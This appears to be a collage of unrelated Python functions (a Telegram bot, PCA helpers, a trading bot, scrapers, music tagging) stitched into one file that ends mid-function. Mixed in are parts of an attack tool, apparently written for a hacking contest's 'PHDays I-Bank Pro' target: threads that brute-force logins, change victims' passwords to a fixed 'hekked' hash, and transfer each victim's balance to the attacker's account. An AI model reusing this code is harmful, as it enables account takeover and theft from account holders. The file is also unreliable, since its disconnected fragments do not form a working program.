def start(update, context):
    if is_public_chat(update, context):
        remove_command(context, update)
        bot_hello = context.bot.send_message(
            chat_id=update.effective_message.chat.id,
            text=messages.msg_start,
            parse_mode=ParseMode.HTML)
        cleaner(context, bot_hello)
    else:
        username = update.message.from_user.first_name
        chat_id = update.effective_message.chat.id
        try:
            LOGGER.info(f'Subscription token message {update.message.text}')
            telegram_unique_token = update.message.text.split('/start ')[1]
            params = {
                'telegram_unique_token': telegram_unique_token,
                'chat_id': chat_id
            }
            x = requests.post(EXCHANGE_URL, data=params)
            LOGGER.info(f'Subscription response {x.status_code} {x.text}')
            if x.status_code == 200:
                message = messages.msg_subscribe.format(username, chat_id)
                context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML)
            else:
                message = messages.msg_subscribe_error
                context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML)
        except Exception as e:
            message = messages.msg_default_start.format(username)
            context.bot.send_message(chat_id, message, parse_mode=ParseMode.HTML)
            LOGGER.warning(f'<start> Exception occurred: {str(e)}')
def remove_switch(mode: str) -> None:
    """Remove switch_mode cron jobs.

    Args:
        mode (str): either 'on' or 'off'

    Raises:
        ValueError: mode is not 'on' or 'off'
    """
    if mode not in ['on', 'off']:
        message = f'Invalid mode: {mode}'
        LOGGER.error(message)
        raise ValueError(message)
    trigger = 'sunset' if mode == 'on' else 'shutdown'
    mode = f'switch_{mode}'
    if not CONF[trigger]['remove']:
        message = f'{mode} jobs will not be removed.'
    else:
        jobs = CRONTAB.remove_script_jobs(f'{mode}')
        message = f"Jobs ({mode}) removed: {jobs}"
    LOGGER.info(message)
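# A minimal usage sketch (not part of the original module): it assumes the CONF and CRONTAB
# module globals are configured elsewhere. 'auto' is an intentionally invalid mode used only
# to show the ValueError path.
remove_switch('on')       # removes (or skips) the switch_on jobs, depending on CONF['sunset']['remove']
try:
    remove_switch('auto')
except ValueError as err:
    print(err)            # -> Invalid mode: auto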
def dimensionReductionWithPCA(data: np.ndarray, n_components=None) -> np.ndarray:
    LOGGER.info("Dimensionality reduction with PCA")
    if type(data) != np.ndarray:
        LOGGER.warn(f'PCA data type is {type(data)}')
        if isinstance(n_components, float):
            LOGGER.warn("data is sparse matrix, use integer n_components")
            raise Exception("data is sparse matrix, please confirm n_components use integer")
        from sklearn.decomposition import TruncatedSVD
        pca = TruncatedSVD(n_components)
        return pca.fit_transform(data)

    def _su(a: list, cp: float):
        # index of the first component where the cumulative ratio exceeds cp
        p = 0
        for i in range(len(a)):
            p += a[i]
            if p > cp:
                return i
        return len(a)

    assert data.ndim == 2
    import math
    if n_components is None:
        n_components = math.ceil(data.shape[1] / 2)
    assert isinstance(n_components, int) or isinstance(n_components, float)
    if isinstance(n_components, int):
        if n_components > min(data.shape):
            n_components = min(data.shape)
            warnings.warn(f"n_components exceeds max size, revised to {n_components}")
        pca = PCA(n_components)
        return pca.fit_transform(data)
    else:
        assert 0 < n_components < 1
        pca = PCA()
        result = pca.fit_transform(data)
        components = _su(pca.explained_variance_ratio_, n_components)
        LOGGER.info(f'Dimensionality reduction components is {components}')
        return result[:, 0:components + 1]
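# A minimal usage sketch (not part of the original module), assuming numpy and scikit-learn are
# available; the shapes are illustrative. With a float n_components the function keeps enough
# components to exceed that explained-variance ratio.
import numpy as np

X = np.random.rand(200, 30)
X_half = dimensionReductionWithPCA(X)                    # defaults to ceil(30 / 2) = 15 components
X_var = dimensionReductionWithPCA(X, n_components=0.95)  # keep ~95% of the variance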
def feature_decomposition(transformer, train_features, test_features):
    LOGGER.info("Beginning Dimensionality reduction using truncated SVD (%d features)"
                % transformer.n_components)
    train_dfeatures = transformer.fit_transform(train_features)
    # LOGGER.debug(["%6f " % transformer.explained_variance_ratio_[i] for i in range(5)])
    LOGGER.debug("%0.4f%% of total variance in %d features\n" % (
        100 * transformer.explained_variance_ratio_.sum(), transformer.n_components))
    return train_dfeatures, transformer.transform(test_features)
def main():
    # get zip codes
    zip_codes = [row.zip_code for row in session.query(ZipCode).all()]

    # # add leading 0's to zip codes due to excel's stupidness
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str)
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x)

    current_month = datetime.date.today().month
    current_rows = session.query(Indeed).filter(
        extract('month', Indeed.date_created) == current_month).all()
    current_rows = [row.as_dict() for row in current_rows]
    existing_zip_codes = [row['zip_code'] for row in current_rows]
    remaining_zip_codes = [
        zip_code for zip_code in zip_codes if zip_code not in existing_zip_codes
    ]
    LOGGER.info(
        'Found {} rows for current month: {}. Extracting {} remaining zip codes'
        .format(len(current_rows), current_month, len(remaining_zip_codes)))

    for i, zip_code in enumerate(remaining_zip_codes):
        job_count = get_num_job_postings(zip_code)
        row = Indeed(zip_code=zip_code,
                     job_count=job_count,
                     date_created=datetime.date.today())
        session.merge(row)
        session.commit()
        LOGGER.info("Extracting zip code {} ({} of {})".format(
            zip_code, i, len(remaining_zip_codes)))
    session.close()
def check_order_made_status(self):
    while True:
        order = self.client.get_order(symbol=self.symbol, orderId=self.order_made_id)
        status = order['status']
        LOGGER.info(f'CURRENT ORDER STATUS: {status}')
        if self.order_made_time + timedelta(minutes=5) < datetime.now():
            if status == 'PARTIALLY_FILLED':
                if self.order_made_time + timedelta(minutes=20) < datetime.now():
                    self.order_made_status = status
                    self.order_executed = order
                    if order['side'] == 'BUY':
                        self.bot_status = 'BOUGHT'
                    if order['side'] == 'SELL':
                        self.bot_status = 'SOLD'
                    return
            if status == 'NEW':
                self.client.cancel_order(symbol=self.symbol, orderId=self.order_made_id)
        if status in ['FILLED', 'CANCELED', 'REJECTED', 'EXPIRED']:
            self.order_made_status = status
            self.order_executed = order
            if status == 'FILLED':
                if order['side'] == 'BUY':
                    self.bot_status = 'BOUGHT'
                if order['side'] == 'SELL':
                    self.bot_status = 'SOLD'
            return
        LOGGER.info('WAITING 30 SECONDS TO CHECK ORDER AGAIN')
        time.sleep(30)
def paginate_request(resource_uri, page_size, request_callback=None):
    page = 1
    data = []
    while True:
        param_prefix = "&" if "?" in resource_uri else "?"
        pagination_params = "{}page={}&page_size={}".format(param_prefix, page, page_size)
        api_uri = "{resource_uri}{pagination_params}".format(
            resource_uri=resource_uri, pagination_params=pagination_params)
        response = request(api_uri)
        response_data = response["data"]
        if request_callback:
            request_callback(response_data)
        data += response_data
        if not data:
            break
        total_count = response["meta"]["page"]["total_count"]
        page = response["meta"]["page"]["current_page"]
        records_fetched_count = page_size * page
        LOGGER.info("paginate_request: {}\t records fetched: {}/{}".format(
            resource_uri, records_fetched_count, total_count))
        if records_fetched_count >= total_count:
            break
        page += 1
    return data
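# A minimal usage sketch (not part of the original module), assuming the module-level request()
# helper returns the {"data": [...], "meta": {"page": {...}}} envelope used above; the URI and
# the callback are illustrative placeholders.
def log_batch(batch):
    LOGGER.info("received %d records", len(batch))

records = paginate_request("/api/v1/devices?active=true", page_size=100, request_callback=log_batch)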
def get_itunes_track_data(self, track_path, itunes_keys):
    # TODO: iTunes uses HTML encoding for some things (ampersands) and URL encoding for the rest
    with open('/Users/carmstrong/Music/iTunes/iTunes Music Library.xml', 'rb') as itunes_xml:
        tree = etree.parse(itunes_xml)
    itunes_track_path = 'file://' + urllib.quote(track_path.encode('utf-8'), safe="/(),'")
    location_node = tree.xpath('//string[text()="{}"]'.format(itunes_track_path))
    if not location_node:
        LOGGER.info('{} not found in iTunes XML file.'.format(itunes_track_path))
        return
    results = {}
    for itunes_key in itunes_keys:
        try:
            itunes_value = location_node[0].xpath(
                "../key[text()='{}']".format(itunes_key))[0].getnext().text
            try:
                itunes_value = int(itunes_value)
            except (ValueError, TypeError):
                continue
            results.update({itunes_key: itunes_value})
        except IndexError:
            continue
    return results
def handleTraceback(object):
    context = object.context
    entry_url = object.entry_url

    if entry_url is None:
        return

    LOGGER.info("handle traceback [%s]" % entry_url)
    try:
        cleanup_lock.acquire()
        # we don't want to produce any errors here, thus, we'll be nice and die
        # silently if an error occurs here
        try:
            transaction.begin()
            # get our logbook view to use the api
            logbook = context.unrestrictedTraverse('@@logbook')
            # get the generated error url from Products.SiteErrorLog
            err_id = urllib.splitvalue(entry_url)[1]
            # save error
            logbook.save_error(err_id, context=aq_parent(context))
            transaction.get().note('collective.logbook traceback [%s]' % entry_url)
            transaction.commit()
        finally:
            cleanup_lock.release()
    # only warning
    except Exception, e:
        LOGGER.warning("An error occurred while handling the traceback")
        LOGGER.warning("%s" % e)
        LOGGER.exception(e)
def check_profit_status_bought_position(self):
    LOGGER.info('CHECKING PROFIT STATUS FOR BOUGHT POSITION')
    self.profit_check_value = round(
        self.actual_price * self.quoteqty, 6) - round(
        (self.actual_price * self.quoteqty) * self.max_trade_taxes, 6)
    position_bought_winning = round(self.order_executed_quantity + self.stop_pair, 6)
    position_bought_losing = round(self.order_executed_quantity - self.stop_pair, 6)
    LOGGER.info(f'PROFIT CHECK VALUE: {self.profit_check_value}')
    LOGGER.info('VALUES OF STOP TO CHECK OF:')
    LOGGER.info(f'POSITION BOUGHT/WINNING: {position_bought_winning}')
    LOGGER.info(f'POSITION BOUGHT/LOSING: {position_bought_losing}')
    if self.profit_check_value > position_bought_winning:
        self.profit_status = 'WINNING'
    elif self.profit_check_value < position_bought_losing:
        self.profit_status = 'LOSING'
    else:
        self.profit_status = 'STANDING'
def call():
    period = 10
    while True:
        try:
            response = requests.get(url=URL_CHECK_CONNECTION, params=params)
            if response.status_code == 200:
                LOGGER.info('Check connection request to Smartsite sent successfully!')
                active = json.loads(response.content)['result']
                if active:
                    LOGGER.info('Gateway is online!')
                else:
                    LOGGER.info('Gateway is offline!')
                    subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                     shell=True, stdout=subprocess.PIPE)
            else:
                LOGGER.info('Response from Smartsite is not 200')
                subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                 shell=True, stdout=subprocess.PIPE)
        except Exception as ex:
            LOGGER.info('Error when checking connection with message: %s', ex.message)
            subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                             shell=True, stdout=subprocess.PIPE)
        time.sleep(period)
def execute_search(self, url, pause=2):
    """
    Executes a search to Twitter for the given URL
    :param url: URL to search twitter with
    :return: A JSON object with data from Twitter
    """
    headers = {'user-agent': self.get_random_user_agent()}
    try:
        requests.packages.urllib3.disable_warnings(
            requests.packages.urllib3.exceptions.InsecureRequestWarning)
        r = requests.get(url=url,
                         proxies=self.proxies,
                         headers=headers,
                         allow_redirects=False,
                         verify=False,
                         timeout=30)
        LOGGER.info(url)
        time.sleep(pause)
        content = r.text
        dejson = json.loads(content)
        return dejson
    # If we get a ValueError exception due to a request timing out, we sleep for our
    # error delay, then make another attempt
    except ValueError as e:
        # print e.message
        # print "Sleeping for %i" % self.error_delay
        time.sleep(self.error_delay)
        return self.execute_search(url)
def acoustid_lookup(fingerprint, duration):
    results = acoustid.lookup(ACOUST_ID_API_KEY, fingerprint, duration,
                              meta='recordings + releasegroups')
    if results.get('results') and results['results'][0].get('recordings'):
        LOGGER.info('AcoustID result found!')
        recordings = results['results'][0]['recordings']
        recording = max(recordings, key=lambda x: len(x.keys()))
        recording_id = recording['id']
        recording_artists = recording['artists']
        recording_title = recording['title']
        album_artist = recording_artists[0]['name']
        artist = ''.join([
            artist['name'] + artist.get('joinphrase', '')
            for artist in recording_artists
        ])
        album = recording['releasegroups'][0]['title']  # TODO: the results of this are often inconsistent
        return {
            'musicbrainz_releasetrackid': recording_id,
            'title': recording_title,
            'artist': artist,
            'albumartist': album_artist,
            'album': album
        }
    else:
        LOGGER.info('No AcoustID results found.')
        return {}
def do_synchronize_generate(mirrors):
    yield "Starting synchronize...\n"
    for mirror in mirrors:
        yield "Synchronizing '{}'\n".format(mirror.text_val)
        try:
            resp = requests.get(mirror.text_val)
            if resp.status_code != 200:
                yield "Erroneous http status code: {}. Skipping this mirror.\n".format(
                    resp.status_code)
                continue
            packages_mirror = json.loads(resp.content)
            packages = db_session.query(Package).options(
                load_only(Package.owner, Package.repo, Package.path, Package.ptype)).all()
            packages_added = 0
            for package_mirror in packages_mirror:
                found = False
                if "path" not in package_mirror:
                    package_mirror["path"] = None
                for package in packages:
                    if package_mirror["owner"] == package.owner \
                            and package_mirror["ptype"] == package.ptype \
                            and package_mirror["repo"] == package.repo \
                            and package_mirror["path"] == package.path:
                        found = True
                        break
                if not found:
                    LOGGER.info("Synchronize: adding %s", package_mirror)
                    insert_package(package_mirror["owner"],
                                   package_mirror["repo"],
                                   package_mirror["ptype"],
                                   package_mirror["path"],
                                   dateutil.parser.parse(package_mirror["added"]),
                                   commit=False)
                    yield "adding {}\n".format(package_mirror)
                    packages_added += 1
            if packages_added > 0:
                try:
                    db_session.commit()
                except Exception as ex:
                    db_session.rollback()
                    LOGGER.error(ex)
                    LOGGER.debug("{}: {}\n".format(ex, traceback.format_exc()))
                    yield "{}\n".format(ex)
            else:
                db_session.rollback()
            yield "Mirror '{}': {} packages added.\n".format(mirror.text_val, packages_added)
        except Exception as ex:
            LOGGER.error(ex)
            error = "{}: {}\n".format(ex, traceback.format_exc())
            LOGGER.debug(error)
            yield error
    yield "Synchronization done.\n"
def remove_command(context, update):
    # Delete Bot Commands from Group Members
    msg = update.effective_message
    try:
        msg.delete()
        LOGGER.info(f'CMD Message Deleted - {msg.message_id}')
    except BaseException as e:
        LOGGER.info(f'CMD Message Already Deleted - {str(e)}')
def check_profit_status(self):
    if self.bot_status == 'BOUGHT':
        self.check_profit_status_bought_position()
    if self.bot_status == 'SOLD':
        self.check_profit_status_sold_position()
    LOGGER.info(f'PROFIT STATUS: {self.profit_status}')
def handle(fd, address):
    global data_queue
    global uid_queue
    global target_uid_queue
    db = getDB()
    LOGGER.info('connection accepted from %s:%s' % address)
    while True:
        data = fd.readline()
        if not data:
            break
        data = data[:-2]
        r = json.loads(data, object_hook=_obj_hook)
        if hasattr(r, 'action'):
            action = r.action
        else:
            break
        if action == 'postdata':
            try:
                data_queue.put(r.data)
                fd.write(json.dumps({'status': 'ok'}) + '\r\n')
            except:
                fd.write(json.dumps({'error': 'bad request data'}) + '\r\n')
            fd.flush()
        elif action == 'getuid':
            if not uid_queue.empty():
                uid = uid_queue.get()
                pages = 0
                user = db.users.find_one({'_id': uid})
                try:
                    pages = user['pages']
                except:
                    pages = 0
                fd.write(json.dumps({'uid': uid, 'pages': pages}) + '\r\n')
            else:
                fd.write(json.dumps({'error': 'uid queue empty'}) + '\r\n')
            fd.flush()
        elif action == 'getuserinfo':
            try:
                name = r.data
                user = db.users.find_one({'name': name})
                try:
                    u = {'_id': user['_id'],
                         'gender': user['gender'],
                         'location': user['location']}
                    fd.write(json.dumps({'user': u}) + '\r\n')
                except:
                    fd.write(json.dumps({'error': 'not found'}) + '\r\n')
            except:
                fd.write(json.dumps({'error': 'bad request data'}) + '\r\n')
            fd.flush()
        elif action == 'gettargetuid':
            uid = target_uid_queue.get()
            if uid:
                fd.write(json.dumps({'uid': uid}) + '\r\n')
            else:
                fd.write(json.dumps({'error': 'target uid queue empty'}) + '\r\n')
            fd.flush()
        else:
            break
    LOGGER.info('end connection %s:%s' % address)
def classify(classifier, train_features, train_labels, test_features, test_labels,
             desc="Linear classifier"):
    LOGGER.info("Beginning %s" % desc)
    classifier.fit(train_features, train_labels)
    results = classifier.predict(test_features)
    correct = get_correct_num(results, test_labels)
    LOGGER.info("%s predicted %d/%d correctly (%0.3f%% accuracy)\n" % (
        desc, correct, len(test_labels), correct / len(test_labels) * 100))
    return results
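# A minimal usage sketch (not part of the original module), assuming scikit-learn is installed
# and get_correct_num/LOGGER are defined in this module; the synthetic data and the choice of
# LogisticRegression are illustrative.
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=500, n_features=20, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0)
predictions = classify(LogisticRegression(max_iter=1000), X_tr, y_tr, X_te, y_te,
                       desc="Logistic regression")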
def save(self):
    self.sync()
    if self.easyID3.is_modified:
        LOGGER.info('Saving file changes...')
        self.easyID3.save()
    if session.is_modified(self.model):
        LOGGER.info('Committing model changes...')
        session.merge(self.model)
        session.commit()
def rescale_features(train, test):
    LOGGER.info("Rescaling feature matrices")
    if issparse(train):
        LOGGER.info("Converting feature matrices from sparse to dense")
        train = csr_matrix(train).todense()
        test = csr_matrix(test).todense()
    scaler = StandardScaler(with_mean=False)
    train_features_rs = scaler.fit_transform(train)
    return train_features_rs, scaler.transform(test)
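# A minimal usage sketch (not part of the original module), assuming the scipy/scikit-learn
# names used above (issparse, csr_matrix, StandardScaler) are imported at module level; the
# random sparse matrices are illustrative.
from scipy.sparse import random as sparse_random

train_m = sparse_random(100, 50, density=0.1, format='csr', random_state=0)
test_m = sparse_random(20, 50, density=0.1, format='csr', random_state=0)
train_scaled, test_scaled = rescale_features(train_m, test_m)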
def acquire_track_model(self):
    # determine if fingerprint present, if not generate
    if not self.fingerprint:
        self.query_fingerprint()
    # use fingerprint to query model
    self.model = session.query(SavedTrack).get(self.fingerprint)
    # if 0 results, create model
    if not self.model:
        LOGGER.info('Track not found in database; creating...')
        self.model = SavedTrack()
def add_good(user, password, data, opener):
    LOGGER.info('!!Found good: %r %r', user, password)
    with kLock:
        known_users.add(user)
    try:
        acc_data = account_data(user, password, data, opener)
        GOOD.put(acc_data)
    except ValueError:
        LOGGER.error('Error adding %r %r', user, password)
        LOGGER.debug('%s', data)
def iteration_request(id, uri_templete, ignore_404, request_callback):
    resource_uri = uri_templete.format(id)
    response = request(resource_uri, ignore_404=ignore_404)
    if response and response['data']:
        if request_callback:
            request_callback(response['data'])
        LOGGER.info("{} - done".format(resource_uri))
        return response['data']
    LOGGER.info("{} - response empty".format(resource_uri))
    return {}
def decompose_tsvd_target(transformer, train_features, test_features,
                          target_cuml_var_ratio=0.9):
    LOGGER.info("Aiming for %.3f%% cumulative total sum of variance"
                % (target_cuml_var_ratio * 100))
    # transformer = TruncatedSVD(n_components=n_features)
    train_d, test_d = feature_decomposition(transformer, train_features, test_features)
    if sum(transformer.explained_variance_ratio_) < target_cuml_var_ratio:
        return decompose_tsvd_target(
            TruncatedSVD(n_components=(transformer.n_components * 2)),
            train_features, test_features, target_cuml_var_ratio)
    LOGGER.debug("Reduced feature vectors size: %d"
                 % csr_matrix(train_features[-1]).toarray().size)
    return transformer, train_d, test_d
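# A minimal usage sketch (not part of the original module), assuming TruncatedSVD and csr_matrix
# are imported at module level and feature_decomposition (above) is defined; the starting
# component count, target ratio, and random sparse matrices are illustrative. The helper keeps
# doubling n_components until the cumulative explained variance reaches the target.
from scipy.sparse import random as sparse_random

train_m = sparse_random(200, 300, density=0.05, format='csr', random_state=0)
test_m = sparse_random(50, 300, density=0.05, format='csr', random_state=0)
svd, train_red, test_red = decompose_tsvd_target(
    TruncatedSVD(n_components=8), train_m, test_m, target_cuml_var_ratio=0.5)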
def cleaner(context, message):
    time.sleep(PATIENCE)
    try:
        context.bot.deleteMessage(
            chat_id=message.chat_id,
            message_id=message.message_id
        )
        LOGGER.info(f'Message Deleted - #{message.message_id}')
    except BaseException as e:
        LOGGER.info(f'Message Already Deleted - {str(e)}')
def check_mentions(api) -> None:
    """Check for new mentions and favorite them."""
    # Retrieve the last 20 mentions.
    mentions = api.mentions_timeline()
    for tweet in mentions:
        if not tweet.favorited:
            try:
                tweet.favorite()
                LOGGER.info(f'Tweet from {tweet.user.name} favorited!')
            except Exception:
                LOGGER.error('Error on fav', exc_info=True)
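# A minimal usage sketch (not part of the original module), assuming tweepy is installed; the
# four credential names below are placeholders, not values from this project.
import tweepy

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
check_mentions(tweepy.API(auth))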
def persist_zillow_metrics(df):
    metrics_df = df.drop(['city', 'metro', 'state', 'county'], axis=1)
    session.query(ZillowMetrics).delete()  # TODO: should append to existing data in case zillow changes something
    session.commit()
    insert_chunk = 100000
    index_start = 0
    while index_start < len(metrics_df):
        LOGGER.info('Persisting Zillow Metrics rows: {} of {}'.format(
            index_start + insert_chunk, len(metrics_df)))
        engine.execute(
            ZillowMetrics.__table__.insert(
                metrics_df[index_start:index_start + insert_chunk].to_dict('records')))
        index_start += insert_chunk
def main():
    LOGGER.info('Extracting building permit data...')
    post_data_list = generate_post_data((1, 12), (2005, 2015))
    pool = ThreadPool(5)
    results = pool.map(get_census_reponse, post_data_list)
    results_array = parse_results(results)
    for result in results_array:
        session.merge(BuildingPermit(**result))
    session.commit()
def _get_collection(self, collection_name: str):
    """Access a particular database collection

    Note: if the collection does not exist it will be automatically created
    """
    try:
        db_collection = self.cursor[collection_name]
        LOGGER.info(f'connected to {collection_name} collection')
        return db_collection
    except Exception as e:
        raise e
def do_change(self, obj):
    LOGGER.info('Changing password for: %s', obj.user)
    req = urllib2.Request('http://{0}/change_password.php'.format(TARGET_HOST),
                          urllib.urlencode({
                              'password': obj.password,
                              'newpassword': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
                              'newpassword2': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
                          }))
    data = my_url_open(obj.opener, req)
    if 'error' not in data:
        LOGGER.critical('Password changed for user: %s', obj.user)
        return True
def _get_cursor():
    """Access the database

    Note: if the database does not exist it will be automatically created
    """
    try:
        client = MongoClient(DB_URL)
        db_cursor = client[DB_NAME]
        LOGGER.info(f'connected to the {DB_NAME} database')
        return db_cursor
    except Exception as e:
        raise e
def run(self):
    LOGGER.info('Start stealer')
    while 1:
        try:
            obj = GOOD.get(timeout=2)
        except Exception as e:
            LOGGER.error('Unknown error in Stealer')
            continue
        if FORCE_STEAL:
            self.do_otp(obj)
        CHANGE.put(obj)
        GOOD.task_done()
def trainELMWithBvsb(self):
    i = 0
    print("---------------------ELM-BVSB-TRAIN-----------------------------")
    while self._iter_continue:
        i = i + 1
        print(f'-------------------- training round {i} --------------------')
        self.elmc.fit(self.X_train, self.Y_train)
        preData = self.elmc.predict_with_percentage(self.X_iter)
        score = self.elmc.scoreWithPredict(self.Y_iter, preData)
        LOGGER.info(f'Accuracy on the iteration set after round {i}: {score}')
        LOGGER.debug(f'preData type is: {type(preData)}')
        self.updateTrainDataWithBvsb(preData)
        LOGGER.debug(f'Test-set accuracy after training round {i}: {self.score(self.X_test, self.Y_test)}')
def get_target_by_command_ats(command):
    target = -1
    try:
        if 'MainAts' in command or 'AutoAts' in command or 'GenAts' in command or 'Ats' in command:
            target = 0
        else:
            LOGGER.error('Command does not contain an ATS keyword: %s', str(command))
    except Exception as ex:
        LOGGER.error('Error at get_target_by_command_ats function with message: %s', ex.message)
    LOGGER.info('Command is: %s, after parse is: %d', command, target)
    return target
def argBvsbWithAccuracy(self, perData: np.ndarray):
    argAcc = BvsbUtils.getAccIndex(self.Y_iter, perData)
    LOGGER.info(f'Number of samples where KNN and ELM agree: {argAcc.size}')
    if argAcc.size == 0:
        return np.array([], dtype=int)
    assert argAcc.max() < perData.shape[0]
    bvsbData = BvsbUtils.calculateBvsb(perData)
    arrBvsb = np.c_[bvsbData[argAcc], argAcc]
    argSBvsbAcc = arrBvsb[arrBvsb[:, 0].argsort()][:, 1]
    _iterNum = int(min(self.perNum, self._upperLimit))
    LOGGER.debug(f'Number of BVSB-KNN samples requested: {_iterNum}')
    LOGGER.debug(f'Number of samples after BVSB-KNN agreement: {len(argSBvsbAcc)}')
    return argSBvsbAcc[-_iterNum:].astype(int)
def run(self):
    LOGGER.info('Run brute')
    while 1:
        try:
            user, password = ENEMY.get(block=1, timeout=10)
        except Queue.Empty:
            continue
        if user in known_users:
            continue
        self.generate_opener()
        data = self.brute_login_with_session(user, password)
        account_password_queue.task_done()
        if self.check(data):
            add_good(user, password, data, self.opener)
def search_echonest_artist_terms(artist_name):
    artist_results = artist.search(name=artist_name)
    if not artist_results:
        LOGGER.info('Artist not found in Echonest')
        return None
    if artist_results[0].name.lower() == artist_name.lower():
        artist_terms = artist_results[0].terms
        if artist_terms:
            return max(artist_terms, key=lambda x: x['weight'] * x['frequency'])['name']
        else:
            return None
    else:
        LOGGER.info("Artist name did not match top result: {} vs {}".format(
            artist_name, artist_results[0].name))
        return None
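# A minimal usage sketch (not part of the original module), assuming the pyechonest `artist`
# module imported above and a configured Echo Nest API key; the artist name is illustrative.
top_term = search_echonest_artist_terms('Daft Punk')
if top_term:
    LOGGER.info('Top term: {}'.format(top_term))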
def facebook_convert_to_id(fb_url):
    # https://www.facebook.com/profile.php?id=1000
    url_parse = urlparse(fb_url)
    if "facebook.com" in url_parse.netloc:
        if "/profile.php" in url_parse.path:
            preg = r"id=(\d{1,})"
            m = re.findall(preg, url_parse.query)
            if len(m):
                LOGGER.info('successfully converted facebook id for url : [%s to %s]'
                            % (fb_url, m[0]))
                return m[0]
        # https://facebook.com/zuck
        headers = get_headers()
        csrfmiddlewaretoken = get_csrfmiddlewaretoken(headers)
        if csrfmiddlewaretoken:
            data = {
                "csrfmiddlewaretoken": csrfmiddlewaretoken,
                "fburl": fb_url
            }
            headers.update({
                "Cookie": "csrftoken={csrfmiddlewaretoken}".format(
                    csrfmiddlewaretoken=csrfmiddlewaretoken)
            })
            try:
                r = requests.post('http://findmyfbid.in/',
                                  data=data,
                                  timeout=10,
                                  allow_redirects=False,
                                  proxies=PROXIES,
                                  headers=headers)
                location = r.headers['Location']
                preg = r'\d{1,}'
                m = re.findall(preg, location)
                if len(m):
                    LOGGER.info('successfully converted facebook id for url : [%s to %s]'
                                % (fb_url, m[0]))
                    return m[0]
                else:
                    return None
            except Exception as e:
                LOGGER.exception(e)
                return None
        else:
            return None
    else:
        return None
def __init__(self, user, password, data, opener):
    LOGGER.info('Created new account data for %s', user)
    self.user = user
    self.password = password
    self.number = RE_ACCOUNT_NUMBER.search(data)
    self.amount = RE_AMOUNT.search(data)
    self.id = RE_ID.search(data)
    if self.number is None or self.amount is None:
        raise ValueError('No account number or amount in file')
    self.number = self.number.group(1)
    self.amount = self.amount.group(1)
    self.amount = int(float(self.amount))
    self.id = self.id.group(1)
    self.opener = opener
def run(self):
    LOGGER.info('Start changer')
    while 1:
        try:
            obj = CHANGE.get(timeout=2)
        except Exception as e:
            LOGGER.error('Unknown error in Changer!')
            continue
        cookiejar = cookielib.CookieJar()
        self.opener = urllib2.build_opener(
            urllib2.HTTPCookieProcessor(cookiejar),
        )
        self.do_change(obj)
        CHANGE.task_done()
def process(self, event):
    """
    event.event_type
        'modified' | 'created' | 'moved' | 'deleted'
    event.is_directory
        True | False
    event.src_path
        path/to/observed/file
    """
    track_path = event.dest_path if event.event_type == 'moved' else event.src_path
    LOGGER.info('File change detected: {event_type}: {track_path}'.format(
        event_type=event.event_type, track_path=track_path))
    if '/Users/carmstrong/Projects/music_master/tracks/holding' in track_path:
        LOGGER.info('Protected path, will make no changes!!')
        return
    sync_file(track_path, event.event_type)
def trainOSELMWithKNNButBvsb(self):
    i = 0
    print("----------------------OSELM WITH KNN BUT BVSB---------------------------")
    while self._iter_continue:
        i = i + 1
        print(f'--------------- training round {i} -------------------')
        predict = self.elmc.predict(self.X_iter)
        _data = self.getUpdataWithoutBVSB(predict)
        if _data is None:
            LOGGER.warn("No iteration data obtained; stopping iterative training")
            break
        LOGGER.info(f'Number of samples used for training in round {i}: {_data[1].size}')
        print(_data[1].shape)
        self.elmc.fit(_data[0], _data[1])
        LOGGER.debug(f'Test-set accuracy after training round {i}: {self.score(self.X_test, self.Y_test)}')
async def fetch(client, url):
    with async_timeout.timeout(15):
        try:
            headers = {'user-agent': get_random_user_agent()}
            async with client.get(url, headers=headers) as response:
                assert response.status == 200
                LOGGER.info('Task url: {}'.format(response.url))
                try:
                    text = await response.text()
                except:
                    text = await response.read()
                return text
        except Exception as e:
            LOGGER.exception(e)
            return None
def run(self):
    while 1:
        self.generate_opener()
        data = self.brute_login(MY_LOGIN, MY_PASSWORD)
        if 'Transactions' in data:
            LOGGER.info('Account protected')
        else:
            LOGGER.critical('Our account hacked!')
        if self.dup_gold:
            obj = account_data(MY_LOGIN, MY_PASSWORD, data, self.opener)
            RaceObject.set_obj(obj)
            with RaceObject.RaceLock:
                RaceObject.RaceLock.notify()
                RaceObject.RaceLock.wait()
        time.sleep(0.05)
def run(self):
    LOGGER.info('Run enemy generator')
    for password in self.passwords_list:
        # LOGGER.info('Password: %s', password)
        # ENEMY.put((user, ''))
        for user in self.users_list:
            if user in known_users:
                break
            LOGGER.debug('%r:%r', user, password)
            while 1:
                try:
                    account_password_queue.put((user, password), block=1, timeout=1)
                    break
                except Queue.Full:
                    LOGGER.error('account_password queue full!')
def run(self):
    LOGGER.info('Run numeric login-password generator')
    for user in self.users_list:
        account_password_queue.put((user, sha1('{0}|hekked'.format(user)).hexdigest()))
        RECOVER.put(str(user))
        for password in self.passwords_list:
            if user in known_users:
                break
            LOGGER.debug('Add in queue: %s:%s', user, password)
            while 1:
                try:
                    account_password_queue.put((user, password), block=1, timeout=1)
                    break
                except Queue.Full:
                    LOGGER.error('account_password queue full!')
def _pre_otp(self, obj):
    if int(obj.amount) <= 0:
        LOGGER.info('No money on account: %s', obj.user)
        return False
    req = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                          urllib.urlencode({
                              'accountNumberFrom': obj.number,
                              'accountNumberTo': MY_ACCOUNT,
                              'accountSum': obj.amount,
                              'step': 'step2'
                          }))
    data = my_url_open(obj.opener, req)
    # TODO: bad auth??
    if 'PHDays I-Bank Pro: transaction' not in data:
        obj.opener = self.generate_opener()
        self.do_login(obj.user, obj.password, obj.opener)
        data = my_url_open(obj.opener, req)
    return data
def run():
    LOGGER.info('Getting music from HypeMachine...')
